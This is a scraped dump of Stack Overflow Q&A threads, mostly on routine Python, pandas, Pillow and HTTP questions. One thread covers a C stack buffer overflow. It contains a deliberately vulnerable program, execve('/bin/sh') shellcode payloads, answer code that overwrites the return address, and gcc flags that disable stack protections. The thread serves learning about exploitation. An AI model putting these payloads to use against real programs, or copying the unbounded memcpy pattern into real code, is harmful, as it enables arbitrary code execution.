df = pd.DataFrame({"x": x, "y":y})
#You pass the wanted axis to the ax argument
df.plot(kind='scatter', x='x', y='y',title="Nice title", grid=True,fontsize=10, ax=ax)
ax.plot(line, x_line, zorder=-1)
</code></pre>
| 1 | 2016-09-28T09:08:03Z | [
"python",
"pandas",
"matplotlib"
]
|
python remove last comma | 39,732,409 | <p>I have some thing like this in output.txt file</p>
<pre><code>Service1:Aborted
Service2:failed
Service3:failed
Service4:Aborted
Service5:failed
</code></pre>
<p>output in 2nd file(output2.txt) :</p>
<pre><code> Service1 Service2 Servive3 Service4 Service5
Aborted failed failed Aborted failed
</code></pre>
<p>Would like to remove the last comma in the line.</p>
<p>Code I am trying:</p>
<pre><code> file=open('output.txt','r')
target=open('output2.txt','w')
for line in file.readlines():
line=line.strip()
parts=line.split(":")
for part in parts:
var2=part.strip()+","
target.write(var2.rstrip(',')) # Not working
target.close()
</code></pre>
| 1 | 2016-09-27T19:01:01Z | 39,732,619 | <p>I found a simple way to do it, you can of course minimize the steps, but the idea is the same, take a string, reverse it. Then use string replace with a limit of one replacement to replace all commas, this will replace the first comma it encounters in the reversed string. Then, reverse the string with the comma removed and you are done!</p>
<pre><code>string = 'something, is, comma,'
reverse_string = string[::-1] # Reverse the String
reverse_string = reverse_string.replace(',', "", 1) # Remove the first comma
string = reverse_string[::-1] # Reverse the string again to create original
print(string)
</code></pre>
| -1 | 2016-09-27T19:15:47Z | [
"python",
"python-2.7",
"python-3.x"
]
|
python remove last comma | 39,732,409 | <p>I have some thing like this in output.txt file</p>
<pre><code>Service1:Aborted
Service2:failed
Service3:failed
Service4:Aborted
Service5:failed
</code></pre>
<p>output in 2nd file(output2.txt) :</p>
<pre><code> Service1 Service2 Servive3 Service4 Service5
Aborted failed failed Aborted failed
</code></pre>
<p>Would like to remove the last comma in the line.</p>
<p>Code I am trying:</p>
<pre><code> file=open('output.txt','r')
target=open('output2.txt','w')
for line in file.readlines():
line=line.strip()
parts=line.split(":")
for part in parts:
var2=part.strip()+","
target.write(var2.rstrip(',')) # Not working
target.close()
</code></pre>
| 1 | 2016-09-27T19:01:01Z | 39,732,926 | <p>Use a list and append the items to it. Accessing parts[-1] returns the last item from the splitted parts. Then use <code>join()</code> to put the commas in between all collected states:</p>
<pre><code>states = []
for line in file.readlines():
parts=line.strip().split(':')
states.append(parts[-1])
print(','.join(states))
</code></pre>
| 0 | 2016-09-27T19:34:25Z | [
"python",
"python-2.7",
"python-3.x"
]
|
python remove last comma | 39,732,409 | <p>I have some thing like this in output.txt file</p>
<pre><code>Service1:Aborted
Service2:failed
Service3:failed
Service4:Aborted
Service5:failed
</code></pre>
<p>output in 2nd file(output2.txt) :</p>
<pre><code> Service1 Service2 Servive3 Service4 Service5
Aborted failed failed Aborted failed
</code></pre>
<p>Would like to remove the last comma in the line.</p>
<p>Code I am trying:</p>
<pre><code> file=open('output.txt','r')
target=open('output2.txt','w')
for line in file.readlines():
line=line.strip()
parts=line.split(":")
for part in parts:
var2=part.strip()+","
target.write(var2.rstrip(',')) # Not working
target.close()
</code></pre>
| 1 | 2016-09-27T19:01:01Z | 39,733,876 | <p>This makes the output you originally requested:</p>
<pre><code>file=open('output.txt','r')
target=open('output2.txt','w')
states = [line.strip().split(':')[-1] for line in file.readlines()]
target.write(','.join(states))
target.close()
</code></pre>
<p>That is, the output of this code is:</p>
<pre><code>Aborted,failed,failed,Aborted,failed
</code></pre>
<p>For a table view, assuming the tabbed output will line up, this code:</p>
<pre><code>file=open('output.txt','r')
target=open('output2.txt','w')
states, titles = [], []
for line in file.readlines():
title, state = line.split(':')
titles.append(title)
states.append(state)
target.write('\t'.join(titles))
target.write('\n')
target.write('\t'.join(states))
target.close()
</code></pre>
<p>will produce the requested table view (note there are no commas in this output):</p>
<pre><code>Service1 Service2 Servive3 Service4 Service5
Aborted failed failed Aborted failed
</code></pre>
<p>If you want to control alignment more precisely, you'll need to apply formatting, such as measuring the maximum width of text in each column and then using that as a formatting specifier.</p>
| 0 | 2016-09-27T20:37:51Z | [
"python",
"python-2.7",
"python-3.x"
]
|
Why does Pandas skip first set of chunks when iterating over csv in my code | 39,732,421 | <p>I have a very large CSV file that I read via iteration with pandas' chunks function. The problem: If e.g. chunksize=2, it skips the first 2 rows and the first chunks I receive are row 3-4.</p>
<p>Basically, if I read the CSV with nrows=4, I get the first 4 rows while chunking the same file with chunksize=2 gets me first row 3 and 4, then 5 and 6, ...</p>
<pre><code>#1. Read with nrows
#read first 4 rows in csv files and merge date and time column to be used as index
reader = pd.read_csv('filename.csv', delimiter=',', parse_dates={"Datetime" : [1,2]}, index_col=[0], nrows=4)
print (reader)
01/01/2016 - 09:30 - A - 100
01/01/2016 - 13:30 - A - 110
01/01/2016 - 15:30 - A - 120
02/01/2016 - 10:30 - A - 115
#2. Iterate over csv file with chunks
#iterate over csv file in chunks and merge date and time column to be used as index
reader = pd.read_csv('filename.csv', delimiter=',', parse_dates={"Datetime" : [1,2]}, index_col=[0], chunksize=2)
for chunk in reader:
#create a dataframe from chunks
df = reader.get_chunk()
print (df)
01/01/2016 - 15:30 - A - 120
02/01/2016 - 10:30 - A - 115
</code></pre>
<p>Increasing chunksize to 10 skips first 10 rows.</p>
<p>Any ideas how I can fix this? I already got a workaround that works, I'd like to understand where I got it wrong.</p>
<p>Any input is appreciated!</p>
| 1 | 2016-09-27T19:02:03Z | 39,733,348 | <p>Don't call <code>get_chunk</code>. You already have your chunk since you're iterating over the reader, i.e. <code>chunk</code> is your DataFrame. Call <code>print(chunk)</code> in your loop, and you should see the expected output.</p>
<p>As @MaxU points out in the comments, you want to use <code>get_chunk</code> if you want differently sized chunks: <code>reader.get_chunk(500)</code>, <code>reader.get_chunk(100)</code>, etc.</p>
| 1 | 2016-09-27T20:02:23Z | [
"python",
"csv",
"pandas",
"chunks"
]
|
Python redmine api: journals.filter usage | 39,732,493 | <p>For example I have an issue:</p>
<pre><code>issue = redmine.issue.get(100)
</code></pre>
<p>It is possible to get the notes of particular user for this issue?</p>
<p>I found journals.filter method:</p>
<pre><code>issue.journals.filter()
</code></pre>
<p>But I don't know syntax for filter() method.</p>
<p>Can somebody help?</p>
<p>Thanks in advance.</p>
<p>BR, Alex</p>
| 0 | 2016-09-27T19:06:20Z | 39,741,119 | <p>Redmine API doesn't allow you to do that via direct API calls, so you have to first include journals (otherwise you'll make 2 API calls instead of one) and then iterate over them and check if that record belongs to the needed user, e.g.:</p>
<pre><code>issue = redmine.issue.get(ISSUE_ID, include='journals')
for record in issue.journals:
if record.user.id == USER_ID:
print record.id, record.created_at
print record.notes
print record.details
</code></pre>
| 0 | 2016-09-28T07:46:02Z | [
"python",
"python-redmine"
]
|
Pillow handles PNG files incorrectly | 39,732,548 | <p>I can successfully convert a rectangular image into a png with transparent rounded corners like this: </p>
<p><a href="http://i.stack.imgur.com/phKNv.png" rel="nofollow"><img src="http://i.stack.imgur.com/phKNv.png" alt=".png image with transparent corners"></a></p>
<p>However, when I take this transparent cornered image and I want to use it in another image generated with Pillow, I end up with this: <a href="http://i.stack.imgur.com/7iJb0.jpg" rel="nofollow"><img src="http://i.stack.imgur.com/7iJb0.jpg" alt="transparent corners turned black by Pillow"></a></p>
<p>The transparent corners become black. I've been playing around with this for a while but I can't find any way in which the transparent parts of an image don't turn black once I place them on another image with Pillow.
Here is the code I use:</p>
<pre><code>mask = Image.open('Test mask.png').convert('L')
im = Image.open('boat.jpg')
im.resize(mask.size)
output = ImageOps.fit(im, mask.size, centering=(0.5, 0.5))
output.putalpha(mask)
output.save('output.png')
im = Image.open('output.png')
image_bg = Image.new('RGBA', (1292,440), (255,255,255,100))
image_fg = im.resize((710, 400), Image.ANTIALIAS)
image_bg.paste(image_fg, (20, 20))
image_bg.save('output2.jpg')
</code></pre>
<p>Is there a solution for this? Thanks.</p>
<p>Per some suggestions I exported the 2nd image as a PNG, but then I ended up with an image with holes in it:
<a href="http://i.stack.imgur.com/qGd0n.jpg" rel="nofollow"><img src="http://i.stack.imgur.com/qGd0n.jpg" alt="enter image description here"></a>
Obviously I want the second image to have a consistent white background without holes.</p>
<p>Here is what I actually want to end up with. The orange is only placed there to highlight the image itself. It's a rectangular image with white background, with a picture placed into it with rounded corners.
<a href="http://i.stack.imgur.com/XMKxS.jpg" rel="nofollow"><img src="http://i.stack.imgur.com/XMKxS.jpg" alt="enter image description here"></a></p>
| 1 | 2016-09-27T19:10:44Z | 39,819,047 | <p>If you paste an image with transparent pixels onto another image, the transparent pixels are just copied as well. It looks like you only want to paste the non-transparent pixels. In that case, you need a mask for the <code>paste</code> function.</p>
<pre><code>image_bg.paste(image_fg, (20, 20), mask=image_fg)
</code></pre>
<p>Note the third argument here. From the documentation:</p>
<blockquote>
<p>If a mask is given, this method updates only the regions indicated by
the mask. You can use either "1", "L" or "RGBA" images (in the latter
case, the alpha band is used as mask). Where the mask is 255, the
given image is copied as is. Where the mask is 0, the current value
is preserved. Intermediate values will mix the two images together,
including their alpha channels if they have them.</p>
</blockquote>
<p>What we did here is provide an RGBA image as mask, and use the alpha channel as mask.</p>
| 0 | 2016-10-02T16:20:33Z | [
"python",
"pillow"
]
|
HTTP post Json 400 Error | 39,732,571 | <p>I am trying to post data to my server from my microcontroller. I need to send raw http data from my controller and this is what I am sending below:</p>
<pre><code>POST /postpage HTTP/1.1
Host: https://example.com
Accept: */*
Content-Length: 18
Content-Type: application/json
{"cage":"abcdefg"}
</code></pre>
<p>My server requires JSON encoding and not form encoded request.</p>
<p>For the above request sent, I get an 400 error from the server, HTTP/1.1 400 Bad Request</p>
<p>However, when I try to reach the post to my server via a python script via my laptop, I am able to get a proper response.</p>
<pre><code>import requests
url='https://example.com'
mycode = 'abcdefg'
def enter():
value = requests.post('url/postpage',
params={'cage': mycode})
print vars(value)
enter()
</code></pre>
<p>Can anyone please let me know where I could be going wrong in the raw http data I'm sending above ?</p>
| 0 | 2016-09-27T19:12:26Z | 39,732,678 | <p>HTTP specifies the separator between headers as a single newline, and requires a double newline before the content:</p>
<pre><code>POST /postpage HTTP/1.1
Host: https://example.com
Accept: */*
Content-Length: 18
Content-Type: application/json
{"cage":"abcdefg"}
</code></pre>
<hr>
<p>If you donât think youâve got all of the request right, try seeing what was sent by Python:</p>
<pre><code>response = ...
request = response.request # request is a PreparedRequest.
headers = request.headers
url = request.url
</code></pre>
<p>Read the <a href="http://docs.python-requests.org/en/master/api/?highlight=logging#requests.PreparedRequest" rel="nofollow">docs for <code>PreparedRequest</code></a> for more information.</p>
<hr>
<p>To pass a parameter, use this Python:</p>
<pre><code>REQUEST = 'POST /postpage%s HTTP/1.1\r\nHost: example.com\r\nContent-Length: 0\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/4.4.11-v7+\r\n\r\n';
query = ''
for k, v in params.items():
query += '&' + k + '=' + v # URL-encode here if you want.
if len(query): query = '?' + query[1:]
return REQUEST % query
</code></pre>
| 0 | 2016-09-27T19:20:01Z | [
"python",
"json",
"http-post"
]
|
Why is my stack buffer overflow exploit not working? | 39,732,600 | <p>So I have a really simple stackoverflow:</p>
<pre><code>#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
</code></pre>
<p>I'm trying to overflow with this code:</p>
<pre><code>$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
</code></pre>
<p>When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.</p>
<p>Does anyone see the problem? Note: My python may be wrong.</p>
<hr>
<p>UPDATE</p>
<p>What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so, </p>
<pre><code>$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
</code></pre>
<hr>
<p>UPDATE</p>
<p>Could someone be kind enough to exploit this overflow yourself on linux
x86 and post the results?</p>
<hr>
<p>UPDATE</p>
<p>Nevermind ya'll, I got it working. Thanks for all your help.</p>
<hr>
<p>UPDATE</p>
<p>Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.</p>
<p>All Im doing is overflowing the stack at the beginning and pointing my shellcode there.</p>
<p>Like so,</p>
<pre><code>r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
</code></pre>
<p>This should point to the A's. Now what I dont understand is why my address at the end gets changed in gdb.</p>
<p>This is what gdb gives me,</p>
<pre><code>Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
</code></pre>
<p>The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?</p>
<p>When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?</p>
<p>Any help would be appreciated.</p>
<p>Also, I'm compiling with the following options:</p>
<pre><code>gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
</code></pre>
<p>It's really odd because any other address works except the one I need.</p>
<hr>
<p>UPDATE</p>
<p>I can successfully spawn a shell with the following in gdb,</p>
<pre><code>$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
</code></pre>
<p>But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spwan a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.</p>
<p>For instance, now when I run the following I get this in gdb...</p>
<pre><code>Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
</code></pre>
<p>This seems to be caused by execstack be turned on.</p>
<hr>
<p>UPDATE</p>
<p>Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.</p>
| 5 | 2016-09-27T19:14:19Z | 39,737,987 | <p>This isn't going to work too well [as written]. However, it <em>is</em> possible, so read on ...</p>
<hr>
<p>It helps to know what the actual stack layout is when the <code>main</code> function is called. It's a bit more complicated than most people realize.</p>
<p>Assuming a POSIX OS (e.g. linux), the kernel will set the stack pointer at a fixed address.</p>
<p>The kernel does the following:</p>
<p>It calculates how much space is needed for the environment variable strings (i.e. <code>strlen("HOME=/home/me") + 1</code> for all environment variables and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then calculates how many there were (e.g. <code>envcount</code>) and creates an <code>char *envp[envcount + 1]</code> on the stack and fills in the <code>envp</code> values with pointers to the given strings. It null terminates this <code>envp</code></p>
<p>A similar process is done for the <code>argv</code> strings.</p>
<p>Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (e.g. <code>_start</code> from <code>crt0.o</code>) which does some init and then calls <code>main(argc,argv,envp)</code></p>
<p>This is [sort of] what the stack looks like when <code>main</code> gets called:</p>
<pre><code>"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"
// alignment pad ...
char *envp[4] = {
// address of "HOME" string
// address of "LOGNAME" string
// address of "SHELL" string
NULL
};
// string for argv[0] ...
// string for argv[1] ...
// ...
char *argv[] = {
// pointer to argument string 0
// pointer to argument string 1
// pointer to argument string 2
NULL
}
// possibly more stuff put in by ELF interpreter ...
// possibly more stuff put in by _start function ...
</code></pre>
<p>On an <code>x86</code>, the <code>argc</code>, <code>argv</code>, and <code>envp</code> pointer values are put into the first three argument registers of the <code>x86</code> ABI.</p>
<hr>
<p>Here's the problem [problems, plural, actually] ...</p>
<p>By the time all this is done, you have little to no idea what the address of the shell code is. So, any code you write must be RIP-relative addressing and [probably] built with <code>-fPIC</code>.</p>
<p>And, the resultant code can't have a zero byte in the middle because this is being conveyed [by the kernel] as an EOS terminated string. So, a string that has a zero (e.g. <code><byte0>,<byte1>,<byte2>,0x00,<byte5>,<byte6>,...</code>) would only transfer the first three bytes and <em>not</em> the entire shell code program.</p>
<p>Nor do you have a good idea as to what the stack pointer value is.</p>
<p>Also, you need to <em>find</em> the memory word on the stack that <em>has</em> the return address in it (i.e. this is what the start function's <code>call main</code> asm instruction pushes).</p>
<p>This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a <code>main</code> stack frame variable (e.g. <code>buf</code>). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.</p>
<p>Also, on <code>x86</code> architectures, there is special mitigation hardware. For example, a page can be marked <code>NX</code> [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.</p>
<hr>
<p>Here's the [easy] solution ...</p>
<p><code>gcc</code> has some intrinsic functions that can help: <code>__builtin_return_address</code>, <code>__builtin_frame_address</code>.</p>
<p>So, get the value of the real return address from the intrinsic [call this <code>retadr</code>]. Get the address of the stack frame [call this <code>fp</code>].</p>
<p>Starting from <code>fp</code> and incrementing (by <code>sizeof(void*)</code>) toward higher memory, find a word that matches <code>retadr</code>. This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8</p>
<p>So, then do: <code>*fp = argv[1]</code> and return.</p>
<p>Note, extra steps may be necessary because if the stack has the <code>NX</code> bit set, the string pointed to by <code>argv[1]</code> is on the stack as mentioned above.</p>
<hr>
<p>Here is some example code that works:</p>
<pre><code>#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
void
shellcode(void)
{
static char buf[] = "shellcode: hello\n";
char *cp;
for (cp = buf; *cp != 0; ++cp);
// NOTE: in real shell code, we couldn't rely on using this function, so
// these would need to be the CPP macro versions: _syscall3 and _syscall2
// respectively or the syscall function would need to be _statically_
// linked in
syscall(SYS_write,1,buf,cp - buf);
syscall(SYS_exit,0);
}
int
main(int argc,char **argv)
{
void *retadr = __builtin_return_address(0);
void **fp = __builtin_frame_address(0);
int iter;
printf("retadr=%p\n",retadr);
printf("fp=%p\n",fp);
// NOTE: for your example, replace:
// *fp = (void *) shellcode;
// with:
// *fp = (void *) argv[1]
for (iter = 20; iter > 0; --iter, fp += 1) {
printf("fp=%p %p\n",fp,*fp);
if (*fp == retadr) {
*fp = (void *) shellcode;
break;
}
}
if (iter <= 0)
printf("main: no match\n");
return 0;
}
</code></pre>
| 0 | 2016-09-28T04:20:11Z | [
"python",
"c",
"stack-overflow",
"buffer-overflow"
]
|
Why is my stack buffer overflow exploit not working? | 39,732,600 | <p>So I have a really simple stackoverflow:</p>
<pre><code>#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
</code></pre>
<p>I'm trying to overflow with this code:</p>
<pre><code>$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
</code></pre>
<p>When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.</p>
<p>Does anyone see the problem? Note: My python may be wrong.</p>
<hr>
<p>UPDATE</p>
<p>What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so, </p>
<pre><code>$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
</code></pre>
<hr>
<p>UPDATE</p>
<p>Could someone be kind enough to exploit this overflow yourself on linux
x86 and post the results?</p>
<hr>
<p>UPDATE</p>
<p>Nevermind ya'll, I got it working. Thanks for all your help.</p>
<hr>
<p>UPDATE</p>
<p>Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.</p>
<p>All Im doing is overflowing the stack at the beginning and pointing my shellcode there.</p>
<p>Like so,</p>
<pre><code>r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
</code></pre>
<p>This should point to the A's. Now what I dont understand is why my address at the end gets changed in gdb.</p>
<p>This is what gdb gives me,</p>
<pre><code>Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
</code></pre>
<p>The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?</p>
<p>When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?</p>
<p>Any help would be appreciated.</p>
<p>Also, I'm compiling with the following options:</p>
<pre><code>gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
</code></pre>
<p>It's really odd because any other address works except the one I need.</p>
<hr>
<p>UPDATE</p>
<p>I can successfully spawn a shell with the following in gdb,</p>
<pre><code>$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
</code></pre>
<p>But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spwan a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.</p>
<p>For instance, now when I run the following I get this in gdb...</p>
<pre><code>Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
</code></pre>
<p>This seems to be caused by execstack be turned on.</p>
<hr>
<p>UPDATE</p>
<p>Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.</p>
| 5 | 2016-09-27T19:14:19Z | 39,738,856 | <p>There are several protections, for the attack straight from the
compiler. For example your stack may not be executable.</p>
<p><code>readelf -l <filename></code> </p>
<p>if your output contains something like this:</p>
<p><code>GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4</code></p>
<p>this means that you can only read and write on the stack ( so you should "return to libc" to spawn your shell).</p>
<p>Also there could be a canary protection, meaning there is a part of the memory between your variables and the instruction pointer that contains a phrase that is checked for integrity and if it is overwritten by your string the program will exit.</p>
<p>if your are trying this on your own program consider removing some of the protections with gcc commands: </p>
<p><code>gcc -z execstack</code></p>
<p>Also a note on your assembly, you usually include nops before your shell code, so you don't have to target the exact address that your shell code is starting.</p>
<p><code>$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")</code></p>
<p>Note that in the address that should be placed inside the instruction pointer
you can modify the last hex digits to point somewhere inside your nops and not
necessarily at the beginning of your buffer.</p>
<p>Of course <code>gdb</code> should become your best friend if you are trying something
like that. </p>
<p>Hope this helps.</p>
| 2 | 2016-09-28T05:41:21Z | [
"python",
"c",
"stack-overflow",
"buffer-overflow"
]
|
Why is my stack buffer overflow exploit not working? | 39,732,600 | <p>So I have a really simple stackoverflow:</p>
<pre><code>#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
</code></pre>
<p>I'm trying to overflow with this code:</p>
<pre><code>$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
</code></pre>
<p>When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.</p>
<p>Does anyone see the problem? Note: My python may be wrong.</p>
<hr>
<p>UPDATE</p>
<p>What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so, </p>
<pre><code>$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
</code></pre>
<hr>
<p>UPDATE</p>
<p>Could someone be kind enough to exploit this overflow yourself on linux
x86 and post the results?</p>
<hr>
<p>UPDATE</p>
<p>Nevermind ya'll, I got it working. Thanks for all your help.</p>
<hr>
<p>UPDATE</p>
<p>Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.</p>
<p>All Im doing is overflowing the stack at the beginning and pointing my shellcode there.</p>
<p>Like so,</p>
<pre><code>r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
</code></pre>
<p>This should point to the A's. Now what I dont understand is why my address at the end gets changed in gdb.</p>
<p>This is what gdb gives me,</p>
<pre><code>Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
</code></pre>
<p>The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?</p>
<p>When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?</p>
<p>Any help would be appreciated.</p>
<p>Also, I'm compiling with the following options:</p>
<pre><code>gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
</code></pre>
<p>It's really odd because any other address works except the one I need.</p>
<hr>
<p>UPDATE</p>
<p>I can successfully spawn a shell with the following in gdb,</p>
<pre><code>$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
</code></pre>
<p>But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spwan a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.</p>
<p>For instance, now when I run the following I get this in gdb...</p>
<pre><code>Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
</code></pre>
<p>This seems to be caused by execstack be turned on.</p>
<hr>
<p>UPDATE</p>
<p>Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.</p>
| 5 | 2016-09-27T19:14:19Z | 39,783,069 | <p>I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:</p>
<pre><code>unsigned long printesp(void){
__asm__("movl %esp,%eax");
}
</code></pre>
<p>And called it at the end of main right before <code>Return</code> to get an idea where the stack was. From there I just played with that value subtracting 4 from the printed ESP until it worked.</p>
| 0 | 2016-09-30T03:12:14Z | [
"python",
"c",
"stack-overflow",
"buffer-overflow"
]
|
Can't a list have symbols in it? | 39,732,608 | <p>I have not done python before (only javascript). I am finding the docs alien and the other stackoverflow posts on <code>list.pop()</code> even more cryptic!</p>
<p>my args are <code>'0','0','0','0','0000'</code></p>
<p>here's my code:</p>
<pre><code>i=['.','.','.',':','']
host=''
for v in sys.argv[1:]:
host=host+str(v)+str(i.pop())
host=host[:-1]
print host
</code></pre>
<p>I'm trying to get <code>'0.0.0.0:0000'</code></p>
<p>But instead I get: <code>IndexError: pop from empty list</code></p>
<p><a href="https://repl.it/DirH/1" rel="nofollow">https://repl.it/DirH/1</a></p>
<p>The reason I ask is that I can't find any SO questions where the list is symbols <strong>and</strong> the list is declared in plain writing!</p>
| 3 | 2016-09-27T19:14:46Z | 39,732,652 | <p>You <em>can</em> put pretty much whatever you want in a list. It's likely that your <code>sys.argv</code> is too long (even after slicing off the first element).</p>
<p>e.g. if <code>len(sys.argv[1:]) == 6</code> and <code>len(i) == 5</code> than by the time you get to the last element in the <code>for</code> loop, <code>i</code> will be empty. This appears to be the case from the code you posted in the link.</p>
<p>Also note that you're probably better off using <code>zip</code>:</p>
<pre><code>lst = ['.','.','.',':','']
for v, ii in zip(sys.argv[1:], lst): # possibly reversed(i) if you meant to pop off the left side of the list rather than the end?
host += host + str(v)+ str(ii)
</code></pre>
<p>Or (more efficiently):</p>
<pre><code>host = ''.join(j+ii for j, ii in zip(sys.argv[1:], lst))
</code></pre>
<p>Of course, you still likely end up with incorrect output (even with <code>zip</code>) if the input lists aren't the correct lengths -- However, you won't get an exception, just a shorter output string than you might be expecting since <code>zip</code> truncates when one of the iterables is exhausted.</p>
| 4 | 2016-09-27T19:18:28Z | [
"python"
]
|
Can't a list have symbols in it? | 39,732,608 | <p>I have not done python before (only javascript). I am finding the docs alien and the other stackoverflow posts on <code>list.pop()</code> even more cryptic!</p>
<p>my args are <code>'0','0','0','0','0000'</code></p>
<p>here's my code:</p>
<pre><code>i=['.','.','.',':','']
host=''
for v in sys.argv[1:]:
host=host+str(v)+str(i.pop())
host=host[:-1]
print host
</code></pre>
<p>I'm trying to get <code>'0.0.0.0:0000'</code></p>
<p>But instead I get: <code>IndexError: pop from empty list</code></p>
<p><a href="https://repl.it/DirH/1" rel="nofollow">https://repl.it/DirH/1</a></p>
<p>The reason I ask is that I can't find any SO questions where the list is symbols <strong>and</strong> the list is declared in plain writing!</p>
| 3 | 2016-09-27T19:14:46Z | 39,732,686 | <pre><code>a=['script','location','00','11','22','33','4444']
i=['.','.','.',':','',''] # added an extra ''
host=''
for v in a[1:]:
host=host+str(v)+i.pop(0)
print (host)
</code></pre>
<p>Something like this? Changed pop(0) cause you want the start not the end. Your issue was you were trying to pop more than there was. </p>
| 2 | 2016-09-27T19:20:17Z | [
"python"
]
|
Can't a list have symbols in it? | 39,732,608 | <p>I have not done python before (only javascript). I am finding the docs alien and the other stackoverflow posts on <code>list.pop()</code> even more cryptic!</p>
<p>my args are <code>'0','0','0','0','0000'</code></p>
<p>here's my code:</p>
<pre><code>i=['.','.','.',':','']
host=''
for v in sys.argv[1:]:
